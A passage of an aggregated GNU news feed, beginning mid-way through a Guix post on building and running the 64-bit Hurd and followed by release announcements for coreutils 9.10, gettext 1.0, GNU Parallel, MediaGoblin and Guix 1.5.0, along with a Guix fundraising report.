Update the gcc cross compiler to GCC 14 (one, simple commit), and
Fix all cross builds (initially "just" 23 commits).

The second step involves building for all architectures and fixing all breakage. Sometimes, fixing one architecture breaks another.

When Guix supported cross-building with GCC 14, and supported the 64-bit Hurd, we could create and boot a 64-bit childhurd. After that, we could start building 64-bit Hurd packages...but only after also

Use gcc-14, gcc-toolchain-14 on the 64-bit Hurd

This, however does not support offloading. For that, we would need to:

Update gcc, gcc-toolchain, libgccjit to 14, and
Make sure that all packages in commencement.scm successfully build natively on x86_64-hurd, which took only some 35 commits.

This can simply be verified by building the hello package:

guix build --system=x86_64-gnu hello

However, GCC 14 is not a regular update: it is waaay more strict with respect to C code compilation. This means that, before actually switching, we had to fix 173 package builds and update another 109 packages to not break all of Guix. This took a total of 17 people and 35 weeks to complete.

You can understand that we are excited that the NLnet Foundation has been sponsoring this work!

Installing and Using the 64-bit Hurd

Easiest is to change your 32-bit childhurd definition into 64-bit, by adding

(type 'hurd64-qcow2)

to your hurd-vm-configuration. And if you don't have a hurd-vm-configuration yet?. Easy, in that case just add

(use-service-modules virtualization)
[..]
(hurd-vm-configuration
  (type 'hurd64-qcow2))

into your your hurd-vm-service-type definition[^0]. And if you don't have a hurd-vm-service-type yet? Easy, in that case just add

(use-service-modules virtualization)
[..]
(service hurd-vm-service-type
         (hurd-vm-configuration
           (type 'hurd64-qcow2)))

to your operating system definition. Reconfigure your system and you'd be able to:

(if you don't have a childhurd definition in your ~/.ssh/config you will have to use something like: ssh -p 10022 root@localhost[^1]).

And if you don't have a Guix operating system definition...The 64-bit Hurd is now an option in the installer:

and can be installed in a VM. Make sure to use --machine q35 with qemu.

To build a disk image for a virtual machine, do:

./pre-inst-env guix system image --image-type=hurd64-qcow2 \
    gnu/system/examples/bare-hurd64.tmpl

You may run it like so:

guix shell qemu -- qemu-system-x86_64 -m 2048 -M q35       \
  --enable-kvm                                             \
  --device e1000,netdev=net0                               \
  --netdev user,id=net0,hostfwd=tcp:127.0.0.1:10022-:2222  \
  --snapshot                                               \
  --hda /gnu/store/...-disk-image

(note that the 64-bit Hurd does not seem to show a login prompt)

and use it like:

ssh -p 10022 root@localhost
guix build -e '(@@ (gnu packages commencement) gnu-make-boot0)'

or even, if you build the image with at least --image-size=3G:

guix build hello

RumpNET Support

Upstream has added support for Intel i8254x Gigabit Ethernet using RumpNET.

Damien Zammit wrote:

This adds a working rump driver for /dev/wmX cards, which are Intel i8254x Gigabit Ethernet devices. (See man.netbsd.org for "wm(4)") This should be easily extended to support other NICs by contributing some makefile foo to netbsd/rump.

Example usage[^2]:

settrans -fgap /dev/rumpnet /hurd/rumpnet
settrans -fgap /dev/wm0 /hurd/devnode -M /dev/rumpnet wm0
settrans -fgap /servers/socket/2 /hurd/pfinet -i /dev/wm0
ifup /dev/wm0

With our updated hurd and rumpkernel packages, this should be available in Guix now too. Please let us know if you got it to work! (If you tried and didn't get it to work, we'd also like to know!)

Status

One of the most frequently asked questions is probably: Does X work on the Hurd yet? The canonical answer to that question is: Please read the GNU/Hurd FAQ.

A good summary of the current status was presented by Samuel Thibault in his GNU/Hurd progress at FOSDEM'26, in which he also makes compelling arguments for the Hurd, such as: Freedom from the system administrator and sharing the GNU heritage and values it's no coincidence that Guix also solves a part of that problem, allowing any user to install packages.

Debian GNU/Hurd has been a reality for some years now, reaching 75% of Debian packages being available for the Hurd.

As a comparison, in Guix only about 1.7% (32-bit) and 0.9% (64-bit) of packages are available for the Hurd. These percentages fluctuate a bit but continue to grow (both grew with a couple tenth percent point during the preparation of this blog post), and as always, might grow faster with your help.

So while Guix GNU/Hurd has an exciting future, please be aware that it lacks many packages and services, including Xorg.

If you would simply like to install the Hurd on bare metal running your favorite window manager (e.g.: i3, icewm, etc.) or lightweight desktop environment (Xfce) right now, then installing Debian GNU/Hurd is a good choice. Though we hope to catch up to them soon!

Last October, the 64-bit Hurd was reported to run on bare metal. Now that Guix 1.5.0's installer also lets you install the Hurd on bare metal, we'd be thrilled to year from you if you manage to replicate this!

What's Next?

In an earlier post we tried to answer the question “Why bother with the Hurd anyway?” An obvious question because it is all too easy to get discouraged, to downplay or underestimate the potential social impact of GNU and the Hurd.

Echoing Samuel Thibault's talk we would like to add: because it offers a better:

Freedom #0: the freedom to run the program as you wish, for any purpose.
Freedom from the System Administrator.

guix pull is known to work but only by pulling from a local branch doing something like:

mkdir -p src/guix
cd src/guix
git clone https://git.guix.gnu.org/guix.git master
cd master
git branch keyring origin/keyring
guix pull --url=$HOME/src/guix/master

kinda like we did it in the old days.

Other interesting task for Guix include:

Have guix pull from a non-local URL work on the Hurd,
Have guix system reconfigure work on the Hurd,
Figure out WiFi support with NetDDE (and add it to installer!),
Figure out WiFi support with RumpNET (and add it to installer!),
An isolated build environment (or better wait for, err, contribute to the Guile build daemon?),
An installer running the Hurd, and,
Packages, packages, packages!

We tried to make Hurd development as easy and as pleasant as we could. As you have seen, things start to work pretty nicely and there is still plenty of work to do in Guix. In a way this is “merely packaging” the amazing work of others. Some of the real work that needs to be done and which is being discussed and is in progress right now includes:

Audio support (this was sponsored by NLnet, thanks!),
RumpNET,
SMP,
Journaling for ext2,
AArch64,
RISC-V.

With the exception maybe of adding RumpNET NICs, these tasks look daunting, and indeed that’s a lot of work ahead. But the development environment is certainly an advantage. Take an example: surely anyone who’s hacked on device drivers or file systems before would have loved to be able to GDB into the code, restart it, add breakpoints and so on—that’s exactly the experience that the Hurd offers. As for Guix, it will make it easy to test changes to the micro-kernel and to the Hurd servers, and that too has the potential to speed up development and make it a very nice experience.

SMP support for the 64-bit Hurd

During the preparation of this blog post a patch set fixing SMP for the 64-bit Hurd, (well, gnumach actually) was presented by Damien Zammit. So most probably we'll have 64-bit multiprocessing real soon now! It seems however, that we will need new bootstrap binaries for that.

Join #guix and #hurd on libera.chat or the mailing lists and get involved!

Footnotes

[0]: Note: with an up-to-date guix this is no longer necessary!
Actually, as the 64-bit Hurd uses rumpdisk exclusively, and gnumach by default uses still it builtin IDE drivers, we also need to tell gnumach about that by adding the (kernel-arguments '("noide")).

(use-service-modules virtualization)
[..]
(hurd-vm-configuration
  (type 'hurd64-qcow2)
  (os (operating-system
        (inherit %hurd-vm-operating-system)
        (kernel-arguments '("noide")))))

We expect this to be the the default in the future.

[1]: You may have to override your childhurd's openssh-service definition, something like

(services
 (modify-services (operating-system-user-services %hurd-vm-operating-system)
   (openssh-service-type
    config =>
    (openssh-configuration
     (inherit config)
     (authorized-keys `(("root"
                         ,(local-file "/home/janneke/.ssh/janneke.pub"))))))))

but you can also take inspiration from the bare-hurd64.tmpl template.

[2]: Note that while is comes straight from a commit to the Hurd git repository, this is a Debian-specific recipe, Guix does not have ifup, and per this updated wiki page there's probably extra networking interface configuration needed too (in Debian you're intstructed to -- imperatively -- edit /etc/network/interfaces).

GNU MediaGoblin: MediaGoblin 0.15.0

Thu, 26 Feb 2026 01:25:23 +0000

We're pleased to announce the release of GNU MediaGoblin 0.15.0. See the release notes for full details and upgrading instructions.

This is a relatively small release to resolve installation issues on Debian Trixie and Bookworm.

This version has been tested on Debian Bookworm (12), Debian Trixie (13), Ubuntu 22.04, Ubuntu 24.04 and Fedora 43. This release drops support for Debian Bullseye (11) and Ubuntu 20.04.

To join us and help improve MediaGoblin, please visit our getting involved page.

FSF News: The FSF announces global call for FSF's LibreLocal 2026 meetups

Tue, 24 Feb 2026 22:09:29 +0000

BOSTON, Massachusetts, USA (Tuesday, February 24, 2026), â€” The Free Software Foundation (FSF) has just launched its global call for LibreLocal 2026.

parallel @ Savannah: GNU Parallel 20260222 ('Epstein files') released [stable]

Sun, 22 Feb 2026 22:29:53 +0000

GNU Parallel 20260222 ('Epstein files') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:
Und die Tage jetzt hab ich GNU parallel für mich entdeckt, auch ne nette Geschichte, gerade wenn's irgendwelche remote APIs sind.
-- Vince @dd1des.bsky.social

New in this release:

No new features.
Bug fixes.

About GNU Parallel

Give a demo at your local user group/team/colleagues
Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
Get the merchandise https://gnuparall ... igns/gnu-parallel
Request or write a review for your favourite blog or magazine
Request or build a package for your favourite distribution (if it is not already there)
Invite me for your next conference

If you use programs that use GNU Parallel for research:

Please cite GNU Parallel in you publications (use --citation)

If GNU Parallel saves you money:

(Have your company) donate to FSF https://my.f ... .org/donate/

About GNU SQL

About GNU Niceload

GNU Guix: Result of Sustain and Strengthen Fundraising

Tue, 17 Feb 2026 11:00:00 +0000

Results from Guix Fundraising

We're on course to beat our fundraising target to sustain and strength Guix. We're bringing the fundraising campaign to an end, so let's cover how much we've raised and what it means for GNU Guix.

After four months of fundraising we've raised €11,378 for the GNU Guix project. This means we've received money for 75% of our €15,000 annual goal.

We also pre-registered tickets for Guix Days this year. Pjotr Prins and Manolis Ragkousis have done a stellar job organising it for many years, along with the Declarative and Minimalistic Computing devroom at FOSDEM (videos are up!). Guix Foundation financially supports it as it's a great opportunity for people to spend time together working on improving Guix. Operating a registration system was very successful, raising €3,830 which really contributed to covering the event's costs. Thank you everyone who took part!

Recurring donations are critical for the Guix project to be sustainable. If we're certain that there's a regular stream of donations then we can match it with the recurring costs the project incurs (e.g our build farm). This means there's a lot less risk that we'll suddenly have to reduce the shared resources the project depends on: this is where we were last year when we were weeks away from needing to reduce the hosting.

Between Stripe and Open Collective 136 people have stepped forward to support the project with recurring donations. During December and January, 17 new people started regular donations. As we'd expect some people stop donating after a while, over that same period we lost 8 recurring donors.

The total recurring monthly donations are €1,650. If we annualise those figures then we could raise about €19,800 for the Guix project this year. This doesn't account for any churn, but nonetheless that's fantastic! The impact of recurring donations is considerable as it means a small amount per month really adds up over time. The maths is simple, but don't underestimate how much it helps!

The more donations we gather, the more we can do to support Guix. If you'd like to help out the project whether with a single donation or a recurring donation you can:

DONATE NOW

SUSE Cares Donation

In December SUSE contacted us to tell us that they'd like to donate $500 to Guix Foundation on behalf of SUSE Cares their philanthropic giving programme. This is an employee programme that enables SUSE employees to support charities of their choice. Tanguy and I have completed the registration documents and we expect to receive the donation shortly. This is fantastic, Thank you SUSE team!

Having some support from organisations that use Guix or are aligned with our mission would be great. If you know of an organisation, company or non-profit that might be able to support Guix please get in contact with me.

What we've learnt

If we take the donations we've received so far, add the registrations from Guix Days and we make a conservative forecast on how recurring donations will come through then we will raise €33,900 for Guix over the year. That's over twice the target we set!

That's great and thanks to everyone who's helped Guix. It's been fantastic seeing so many people answer the call to take action and help the project. Guix Foundation has grown with nearly 100 people joining. This gives us a healthy, user-supported non-profit around Guix.

How we're using the money

The first priority for using the money we've raised is to support and improve the key infrastructure that the project relies on. One way we'll be doing that is by Guix Foundation joining Codeberg e.V. and financially supporting their efforts. This is important for Guix both because their mission of creating a Free Software platform for collaboration aligns with our goals, but also because we directly rely on Codeberg being able to run a reliable development service. As we know running infrastucture is complex and expensive.

Guix Foundation also aims to support the development of Guix, and the community around it. That could mean sponsoring development, running events and adding community services. For Guix Days I put together a talk about the fundraising and our future plans. The talk's available as a PDF, or there's a video on YouTube(1440p) and TILvids Peertube (1080p).

Jose E. Marchesi: First package written in Algol 68 lands in Gentoo

Thu, 05 Feb 2026 10:00:00 +0000

To my knowledge Gentoo just became the first GNU/Linux distro ever packaging and distributing a program that happens to be written in Algol 68... have no doubt, others will follow shortly ;)

https://packages.gentoo.org/packages/dev-util/godcc

Jose E. Marchesi: Algol 68 support in VS Code

Thu, 05 Feb 2026 10:00:00 +0000

Pietro Monteiro has added Algol 68 support syntax highlighting for VS Code. You can get the sources at https://codeberg.org/sleepy4727/supper-algol-68. He has also adapted it to add support for Algol 68 syntax highlighting in Compiler Explorer, with the help of Iain Buclaw. See how it looks at https://godbolt.org/z/84bPbbexa.

With this work VS Code joins Emacs and Vim in the happy family of editors providing syntax highlighting and indentation for Algol 68.

Thank you Pietro and Iain!

Jose E. Marchesi: godcc 1.0 released

Wed, 04 Feb 2026 21:00:00 +0000

I am happy to announce the first release of godcc, version 1.0.

The tarball godcc-1.0.tar.gz is now available at https://jemarch.net/godcc-1.0.tar.gz.

godcc (https://jemarch.net) is a full-fledged command-line interface to Compiler Explorer instances such as https://godbolt.org. It currently supports getting listings, compiling source files and formatting sources.

Happy godccing!

coreutils @ Savannah: coreutils-9.10 released [stable]

Wed, 04 Feb 2026 12:58:31 +0000

This is to announce coreutils-9.10, a stable release.

Notable changes include:
- Options in man pages link directly into the full web docs
- timeout(1) now kills the command for all terminating signals
- paste(1) is now multi-byte character aware
- cp(1) fixes an unlikely infinite loop introduced in v9.9
- The multi-call binary is 3.2% smaller

There have also been many bug fixes and other changes
as summarized in the NEWS below.

There have been 288 commits by 10 people in the 12 weeks since 9.9.
Thanks to everyone who has contributed!
The following people contributed changes to this release:

Bernhard Voelker (1)
Bruno Haible (1)
Christopher Illarionova (2)
Collin Funk (92)
Dmitry V. Levin (1)
Egmont Koblinger (3)
Paul Eggert (14)
Padraig Brady (159)
Sylvestre Ledru (5)
oech3 (10)

Padraig [on behalf of the coreutils maintainers]
==================================================================

Here is the GNU coreutils home page:
    https://gnu.org/s/coreutils/

Here are the compressed sources:
https://ftp.gnu.org/gnu/coreutils/coreutils-9.10.tar.gz   (15MB)
https://ftp.gnu.org/gnu/coreutils/coreutils-9.10.tar.xz   (6.3MB)

Here are the GPG detached signatures:
https://ftp.gnu.org/gnu/coreutils/coreutils-9.10.tar.gz.sig
https://ftp.gnu.org/gnu/coreutils/coreutils-9.10.tar.xz.sig

Use a mirror for higher download bandwidth:
https://www.gnu.org/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

SHA256 (coreutils-9.10.tar.gz) = 4L3h+2hQlEf8cjzyUX6KjH+kZ2mRm7dJDtNQoukjhWI=
SHA3-256 (coreutils-9.10.tar.gz) = ajdC0yoxKq5sDXyeL9nMXNSZ26du/3QtZCEo4PNZZkA=
SHA256 (coreutils-9.10.tar.xz) = FlNamt8LEANzZOLWEqrT2fTso6NElJztdNEvr0vVHSU=
SHA3-256 (coreutils-9.10.tar.xz) = jUv9Ki9gdL5VuXEhDhGyuR+Md4r2PAnkJ9JCw1xdoWY=

Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.

Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:

gpg --verify coreutils-9.10.tar.xz.sig

The signature should match the fingerprint of the following key:

pub   rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]
        Key fingerprint = 6C37 DC12 121A 5006 BC1D B804 DF6F D971 3060 37D9
uid                   [ultimate] Pádraig Brady <P@draigBrady.com>
uid                   [ultimate] Pádraig Brady <pixelbeat@gnu.org>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key P@draigBrady.com

gpg --recv-keys DF6FD971306037D9

wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify coreutils-9.10.tar.xz.sig

This release is based on the coreutils git repository, available as

git clone https://https.git.savannah.gnu.org/git/coreutils.git

with commit 89b2cd58ac895e3fc0d24d8f10e7e4ba132e7fb6 tagged as v9.10.

For a summary of changes and contributors, see:

https://gitweb.git.savannah.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.10

or run this command from a git-cloned coreutils directory:

git shortlog v9.9..v9.10

This release was bootstrapped with the following tools:
Autoconf 2.72.101-9513b
Automake 1.18.1
Gnulib 2026-01-24 1c5e0277c2143dd570d8c88f8923eed2afd8e13b
Bison 3.8.2

NEWS

* Noteworthy changes in release 9.10 (2026-02-04) [stable]

** Bug fixes

cp, install, and mv no longer enter an infinite loop copying sparse files
with SEEK_HOLE. E.g., this was seen on ext4 when copying sparse files with
extents that are being actively updated, and copy offload is not being used.
[bug introduced in coreutils-9.9]

'date' no longer fails with format directives that return an empty string.
[bug introduced in coreutils-9.9]

'dd seek=N of=FILE' no longer continues copying, overwriting FILE if it
exists, if ftruncate fails.
[bug introduced in coreutils-9.1]

du and ls no longer modify strings returned by getenv.
POSIX says this is not portable.
[bug introduced in fileutils-4.1.6]

'fmt' now correctly diagnoses read errors.
Previously fmt generated a generic error for any read error.
[bug introduced in coreutils-9.0]

md5sum --text correctly translates CRLF line endings with the MSYS2 runtime.
This also applies to the sha*sum and b2sum utilities.
[This bug was present in "the beginning".]

'numfmt' no longer drops custom suffixes from numbers it cannot fully parse.
[bug introduced with numfmt in coreutils-8.21]

'tail -f --pid' can no longer exit upon receiving a non terminating signal.
On older Linux systems it may have failed with "Interrupted system call".
[bug introduced in coreutils-7.5]

'timeout' will now propagate all terminating signals to the monitored command.
Previously 'timeout' could have exited and left the monitored command running.
[bug introduced with timeout in coreutils-7.0]

wc now documents its --debug option, currently used to
indicate the line count acceleration being used.
[bug introduced in coreutils-9.0]

When built with `clang -fno-inline`, memory allocation issues are again
handled in a defined manner. Previously programs may have crashed etc.
after a failure to allocate memory.
[bug introduced in coreutils-9.0]

** New Features

configure accepts a new --enable-single-binary=hardlinks mode to build the
selected programs as hard links to a multi-call binary called "coreutils".
This augments the existing "symlinks" and "shebangs" modes already
supported by the --enable-single-binary option.

'stat' and 'tail' now know about the "guest-memfd" file system type.
stat -f -c%T now reports the file system type,
and tail -f uses polling for this file system.

'tail' now accepts the --debug option, which is currently used to
detail the --follow implementation being used.

'du' now supports the short option -A corresponding to the existing long
option --apparent-size, for compatibility with FreeBSD.

** Changes in behavior

All commands now markup option names in --help and man pages,
with bold attributes, and hyperlinks into the online manual on gnu.org.
The links can be configured with the --enable-manual-url configure option,
and the bold highlighting with --disable-bold-man-page-references.
At runtime all markup can be disabled with the TERM=dumb env var value.

'fmt' -w,--width no longer includes '\n' in the width of a line.
I.e., the specified width is interpreted to be an _inclusive_ maximum.

'ls --hyperlink' now uses more standard format hyperlinks.
'ESC\' (ST) is now used as a delimiter, instead of '\a' (BEL).

'ptx' -t is no longer a no-op, and now sets the default width to 100 columns.

'timeout' now honors ignored signals and will not propagate them. E.g.,
timeout(1) in a shell backgrounded job, will not terminate upon receiving
SIGINT or SIGQUIT, as these are ignored by default in shell background jobs.

'timeout -v -s 0' now prints the signal number 0 instead of EXIT.

The multi-call binary now only processes --help or --version options
if it is installed with a name ending with "coreutils". This allows
for more consistent handling of these options with unsupported commands.

** Improvements

The multi-call binary built with configure --enable-single-binary
is reduced in size by 3.2% through the more efficient reuse of the cksum
utility by the md5sum and sha*sum utilities.

'cksum' now validates its options more consistently.
E.g., `cksum --text --tag` now fails like `cksum --tag --text` already did.

'cksum', 'du', and 'wc' now exit promptly upon receiving a write
error, which is significant when processing many input files.

csplit, ls, and sort, now handle a more complete set of terminating signals.

'du' now processes directories with 10,000 or more entries up to 9 times
faster on the Lustre file system.

'paste' now supports multi-byte --delimiters characters.

'pinky' will now exit immediately upon receiving a write error, which is
significant when reading large plan or project files.

'readlink' and 'realpath' will now exit promptly upon receiving a write error,
which is significant when canonicalizing multiple file names longer than
PATH_MAX.

'timeout' on Linux will always terminate the child in the case where the
timeout process itself dies, like when it receives a KILL signal for example.

** Build-related

Programs now port to C23 platforms that strictly check types when
qualifier-generic functions like strchr are used.

'chcon' and 'runcon' stub binaries will be built on systems without
libselinux, when configured using --with-selinux.

'kill' and 'uptime' are no longer built by default. These programs can be
built with the --enable-install-program=kill,uptime configure option.

GNU Taler news: GNU Taler 1.4 released

Tue, 03 Feb 2026 23:00:00 +0000

We are happy to announce the release of GNU Taler v1.4.

gettext @ Savannah: GNU gettext 1.0 released

Thu, 29 Jan 2026 17:30:35 +0000

Download from https://ftp.gnu.o ... ttext-0.26.tar.gz

New in this release:

Improvements for maintainers and distributors:
- In a po/ directory, the PO files are now exactly those that the translators submitted or committed in version control, or a translation project's daemon committed on behalf of the translators. They are no longer regularly updated with respect to the POT file in the same directory.
- The advantage for maintainers is that the maintainer may commit the PO files in version control, without getting
  - lots of modified files shown by "git status",
  - frequent merge conflicts when merging between branches,
  - a voluminous version control history.
- The advantage for distributors is that the role of files in a release tarball are clearer: The PO files are source code, whereas the POT file and the *.gmo files are generated files.
- ATTENTION translators! Translators who work directly on a package's source code (without going through a translation project) now need to run "msginit" before starting work on a PO file.
- A new program 'po-fetch' is provided, that fetches the translated PO files from a translation project's site on the internet, and updates the LINGUAS file accordingly.
- In a po/ directory, a new script 'fetch-po' is now added by 'gettextize'. It provides the standard interface for fetching the translated PO files. It typically either invokes the 'po-fetch' program or does nothing.

Improvements for translators:
- msginit:
  - When the PO file already exists, 'msginit' now updates it w.r.t. the POT file, like 'msgmerge' would do. Previously, 'msginit' failed with an error message in this situation.
- Pretranslation:
  - Two new programs, 'msgpre' and 'spit', are provided, that implement machine translation through a locally installed Large Language Model (LLM). 'msgpre' applies to an entire PO file, 'spit' to a single message.
  - The documentation has a new chapter "Pretranslation".

Improvements for maintainers:
- xgettext:
  - The refactoring suggestion when a translatable string contains an URL or email address can now be inhibited through a command-line option '--no-check=url' or '--no-check=email', or through a comment in the source code of the form

/* xgettext: no-url-check */

/* xgettext: no-email-check */

Programming languages support:
- OCaml:
  - xgettext now supports OCaml.
  - 'msgfmt -c' now verifies the syntax of translations of OCaml format strings.
  - A new example 'hello-ocaml' has been added.
- Rust:
  - xgettext now recognizes 'gettextrs::gettext' invocations, like 'gettext' invocations.

libgettextpo library:
- The function 'po_message_get_format' now supports distinguishing whether a negative format string mark, such as 'no-c-format', is set or not.
- The new functions po_message_has_workflow_flag, po_message_set_workflow_flag, po_message_workflow_flags_iterator, po_flag_next, po_flag_iterator_free can be used to manipulate or inspect the workflow flags of a message.
- The new functions po_message_has_sticky_flag, po_message_set_sticky_flag, po_message_sticky_flags_iterator, po_flag_next, po_flag_iterator_free can be used to manipulate or inspect the sticky flags of a messsage.

Emacs PO mode:
- Restore syntax highlighting in Emacs version 30 or newer.

GNU Artanis: Techical report 2026-Jan-28

Wed, 28 Jan 2026 08:26:09 +0000

parallel @ Savannah: GNU Parallel 20260122 ('Maduro') released [stable]

Tue, 27 Jan 2026 23:44:36 +0000

GNU Parallel 20260122 ('Maduro') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

64コアで、64並列でsimlationを回してtopコマンドで状況を見るのは心地よい。簡単に並列処理を実現できるGNU parallelコマンドは素晴らしい。
-- Daisuke Iizuka @diizuka@twitter

New in this release:

No new features.
Bug fixes.

About GNU Parallel

Give a demo at your local user group/team/colleagues
Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
Get the merchandise https://gnuparall ... igns/gnu-parallel
Request or write a review for your favourite blog or magazine
Request or build a package for your favourite distribution (if it is not already there)
Invite me for your next conference

If you use programs that use GNU Parallel for research:

Please cite GNU Parallel in you publications (use --citation)

If GNU Parallel saves you money:

(Have your company) donate to FSF https://my.f ... .org/donate/

About GNU SQL

About GNU Niceload

GNU Guix: GNU Guix 1.5.0 released

Fri, 23 Jan 2026 14:00:00 +0000

We are pleased to announce the release of GNUÂ Guix version 1.5.0!

The release comes with ISO-9660 installation images, virtual machine images, and with tarballs to install the package manager on top of your GNU/Linux distro, either from source or from binariesâ€”check out the download page. Guix users can update by running guix pull.

Itâ€™s been 3 years since the previous release. Thatâ€™s a lot of time, reflecting both the fact that, as a rolling release, users continuously get new features and update by running guix pull; but it also shows a lack of processes, something that we had to address before another release could be made.

During that time, Guix received about 71,338 commits by 744 people, which include many new features; the project also got a new decision-making process, migrated to Codeberg and started a fundraising campaign. Thatâ€™s just the surface among so many great changes, so keep reading!

Illustration by Luis Felipe, published under CC-BY-SAÂ 4.0.

This post provides highlights for all the hard work that went into this release. Thereâ€™s a lot to talk about so make yourself comfortable, relax, and enjoy.

Guix ecosystem

To start with, the Guix ecosystem has seen many exciting developments to the way we collaborate and make decisions!

Firstly, the project adopted with unanimity a new consensus-based decision making process. This process fills a need to be able to gather consensus on significant changes to the project, something that was getting very complicated with the growing number of contributors to the project.

Now, the process provides a clear framework for any contributor to propose and implement important changes. These can be submitted as Guix Consensus Documents (GCDs), each GCD goes through the multiple steps of consensus decision making before being accepted or withdrawn.

Secondly, using this process, the project was able to collectively migrate to Codeberg. This means that all repositories, and bug trackers are now at the same place on Codeberg and that contributions are now made with pull requests instead of patch series.

Thirdly, a new release process was adopted to bring an annual release cycle to Guix. This release is the first to follow this process, with hopefully many others to come!

Lastly, a â€œPlanetâ€� website for Guix is now available at https://planet.guix.gnu.org. It aggregates blogs from various Guix hackers and contributors to bring you the latest and greatest in Guix news.

Stronger distribution

Three years is a long time for free and open source software! Enough time for 12,525 new packages and 29,932 package updates to the Guix repository. Here are the best highlights:

To start, KDE Plasma 6.5 is now available with the new plasma-desktop-service-type!

Continuing on desktops; GNOME has been updated from version 42 to 46 and now uses Wayland by default. The gnome-desktop-service-type was made more modular to better customize the default set of GNOME applications.

Guix System is now using version 1.0 of the GNUÂ Shepherd, which now supports timed services, kexec reboot and has new services for system logs and log rotation which are now used by Guix System instead of Rottlog and syslogd.

There are around 40 new system services to choose from, including Forgejo Runner, RabbitMQ, iwd, and dhcpcd to name a few.

setuid-programs has been replaced with privileged-programs in operating-system definitions to support giving specific Linux capabilities. Additonally, the nss-certs package is now included in %base-packages.

More than 12,500 packages were added, keeping Guix in the top-ten biggest distributions according to Repology! Among the many noteworthy updates, we now have GCCÂ 15.2.0, EmacsÂ 30.2, Icecat and LibrewolfÂ 140, LLVMÂ 21.1.8 and Linux-libreÂ 6.17.12.

Team activity

In the last release, we introduced structured cooperation using teams. There are now 50 teams distributing the many aspects of the distribution. We have per-language teams like python, rust and zig ensuring updates for packages and build systems as well as thematic teams like electronics, hpc and bioinformatics working on specific application domains. Here are what some of these teams have been up to:

The HPC team published their annual activity report 2024, showing the exciting developments of Guix in High-Performance Computing.

The electronics team is maintaining free software based Electronic Design Automation (EDA) packages to cover the needs of professionals and hobbyists in the domain with tools such as KiCad, LibrePCB, Xschem, Qucs-S and RingdoveÂ EDA, as well as Verilog, SystemVerilog and VHDL compilers and a toolchain for programmable designs on GateMate FPGAs. They are also collaborating with the Free Silicon Foundation (F-Si) to push free software in the EDA space!

The science team has been able to add a myriad of Astronomy related packages, accompanied by the Python team bringing the move to the new pyproject.toml-based build system as well as the NumPyÂ 2 update.

Finally, the rust team created a new packaging model to efficiently package rust crates, and was able to migrate the Rust collection, 150+ packages with 3,600+ libraries, in just under two weeks; making the Rust packaging process much easier for everyone.

Full source bootstraps

Full-source bootstraps of the Zig and Mono compilers are now available, and the existing bootstrap of Guix has been reduced once again!

Full-source bootstraps are Guixâ€™s solution to the trusting trust problem: compilers are usually compiled by themselves, so how can you build a compiler without trusting an existing binary? Read these posts to learn more about this fascinating problem:

Improved CLI

The guix graph command has new backends for GraphML and CycloneDXÂ JSON, meaning Guix can now be used to generate complete Software Bill of Material (SBOM) down to the first bootstrap binary!

guix shell containers have been improved with a --nesting option to use Guix within the container and a --emulate-fhs option that can be used to run software expecting a Filesystem Hierarchy Standard (FHS) compliant filesystem.

The guix pack command also received new backends to create RPM packages and AppImages that can be used to publish your Guix packages to non-Guix users.

Lastly, a new guix locate command is now available to find which packages provide a given file.

Security improvements

It is now possible to run the Guix daemon without root privileges, reducing the impact of privilege escalation vulnerabilities.

This â€œrootlessâ€� mode is now the default when installing Guix 1.5.0 on distros other than Guix System; on Guix System, it currently has to be explicitly enabled by setting (privileged? #f) in guix-configuration. Existing installation on distros other than Guix System can also be migrated to â€œrootlessâ€�.

This is possible thanks to the user namespaces. It might be possible that on your system, the user namespaces are not allowed for guix due to the lack of an AppArmor profile. Because of that, weâ€™ve also included AppArmor profiles that are installed by default on foreign systems.

Finally, the Guix daemon received security fixes for CVE-2024-27297, CVE-2024-52867, CVE-2025-46415, CVE-2025-46416 and CVE-2025-59378.

Widened architecture support

Release tarballs are now available for the RISC-V 64-bit architecture (riscv64-linux).

The x86_64 architecture saw some development as well, with the experimental support of the GNUÂ Hurd kernel (x86_64-gnu), aiming to be another significant step in the adoption and development of the Hurd. Overall support for the Hurd was greatly improved, it is now an option in the installer, childhurds can be automatically created with a system service and it can even run on a Thinkpad X60!

Fundraising campaign

Surprisingly, making a completely free software distribution does not come for free! The Guix project needs your help to pay the infrastructure costs of build farms, web servers and QA tools that are essential to making this release happen.

If you appreciate all of the work that is done to bring you this one-of-a-kind distro: please donate to the Guix Foundation!

Acknowledgments

For the release, thanks to all the release team members: Rutherther, RodionÂ Goritskov, EfraimÂ Flashner, and NoÃ©Â Lopez. Thanks as well to the release helpers: AndreasÂ Enge, Mothacehe, Dariqq and LudovicÂ CourtÃ¨s.

For creating the release process, thanks to SteveÂ George.

For their Guix contributions, thanks to the 744 wonderful people who contributed and whose names we donâ€™t list here (it would be a bit long). They can be listed with git log --oneline v1.4.0..v1.5.0 --format="%an" | sort -u. Every commit counts and is always appreciatedÂ ğŸ˜�

About GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64, RISC-V and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.